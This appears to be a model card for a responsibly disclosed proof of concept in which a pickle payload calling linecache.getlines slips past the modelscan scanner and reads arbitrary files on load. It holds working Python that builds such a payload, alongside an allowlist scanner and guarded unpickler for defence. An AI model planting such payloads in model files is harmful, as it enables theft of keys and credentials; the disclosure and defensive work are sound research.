---
license: mit
tags:
- security-research
- modelscan-bypass
---
# modelscan-bypass-linecache

## Security Research — Modelscan Bypass PoC

**Severity**: HIGH
**Module**: `linecache`
**Description**: Arbitrary file read via `linecache.getlines()` invoked during unpickling
**Impact**: Read any file the loading process has permission to open. Can steal SSH keys, credentials, environment files.
## Modelscan Result

```
$ modelscan scan -p pytorch_model.bin
No issues found! ✅ (FALSE NEGATIVE)
```

**Tested against**: modelscan 0.8.8 (latest release at the time of testing)
## How It Works

The pickle file's reduce payload references `linecache.getlines`, and `linecache` is NOT in modelscan's `unsafe_globals` blocklist, so the scan reports no issues.
When the file is loaded via `torch.load()` (with `weights_only=False`; the restricted `weights_only` unpickler rejects globals outside its allowlist) or `pickle.loads()`, the unpickler resolves `linecache.getlines`, calls it with the attacker-chosen path, and returns the target file's lines as the deserialized object.
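The following is an added example, not the PoC's own pickle or any modelscan code: it builds a pickle that calls `linecache.getlines` on a constructed temporary file, shows that an unguarded `pickle.loads()` returns that file's lines, statically scans the opcode stream for every global the unpickler would import (handling both `GLOBAL` and `STACK_GLOBAL`), and loads the same bytes through an `Unpickler` whose `find_class` refuses anything outside an allowlist. `ALLOWED_GLOBALS`, `AllowlistUnpickler`, `demo()` and the `DB_PASSWORD=...` file content are assumptions made for this example.

```python
import io
import linecache
import os
import pickle
import pickletools
import tempfile


class LinecacheReadPayload:
    """Constructed PoC object: pickling it emits a global reference to
    linecache.getlines followed by REDUCE, so unpickling calls
    linecache.getlines(path) and the file's lines become the result."""

    def __init__(self, path):
        self.path = path

    def __reduce__(self):
        return (linecache.getlines, (self.path,))


def build_payload(path, protocol=2):
    """Serialize the payload. Protocol <= 3 emits GLOBAL; 4+ emits STACK_GLOBAL."""
    return pickle.dumps(LinecacheReadPayload(path), protocol=protocol)


def referenced_globals(data):
    """Static scan: every (module, name) pair the stream will hand to
    find_class, collected without executing anything."""
    found = set()
    recent_strings = []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            module, name = arg.split(None, 1)  # "module name"
            found.add((module, name))
        elif op.name == "STACK_GLOBAL":
            # module and name are the two most recently pushed strings
            found.add((recent_strings[-2], recent_strings[-1]))
        elif isinstance(arg, str):
            recent_strings.append(arg)
    return found


# Hypothetical allowlist for this demo; a real one lists exactly the globals
# your model format needs (e.g. the tensor-rebuild helpers torch emits).
ALLOWED_GLOBALS = {("collections", "OrderedDict")}


def allowlist_violations(data, allowed=ALLOWED_GLOBALS):
    """Globals a scanner should flag: anything not explicitly allowed.
    A blocklist that omits linecache misses this; an allowlist cannot."""
    return referenced_globals(data) - allowed


class AllowlistUnpickler(pickle.Unpickler):
    """Runtime guard: refuse any import not on the allowlist, before the
    call that would read the file is ever reached."""

    def find_class(self, module, name):
        if (module, name) not in ALLOWED_GLOBALS:
            raise pickle.UnpicklingError(f"blocked global {module}.{name}")
        return super().find_class(module, name)


def demo(protocol=2):
    """Run the three steps against a constructed file; return what each saw."""
    with tempfile.NamedTemporaryFile("w", suffix=".env", delete=False) as fh:
        fh.write("DB_PASSWORD=constructed-example\n")  # constructed, not real
        target = fh.name
    try:
        payload = build_payload(target, protocol)
        # 1. Unguarded load: the file's lines come back as the "model".
        leaked = pickle.loads(payload)
        # 2. Static allowlist scan flags the import a blocklist missed.
        flagged = allowlist_violations(payload)
        # 3. Guarded load refuses the import; the file is never opened.
        try:
            AllowlistUnpickler(io.BytesIO(payload)).load()
            blocked = False
        except pickle.UnpicklingError:
            blocked = True
    finally:
        os.unlink(target)
    return {"leaked": leaked, "flagged": flagged, "blocked": blocked}


if __name__ == "__main__":
    for proto in (2, 4):
        print(proto, demo(proto))
```

The scanner deliberately does not look up `linecache` in a list of known-bad modules: anything absent from `ALLOWED_GLOBALS` is reported, which is the property a blocklist such as modelscan's `unsafe_globals` cannot give you.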
## Responsible Disclosure

This PoC is part of responsible security research submitted via the Huntr MFV program
to help ProtectAI improve modelscan's detection capabilities.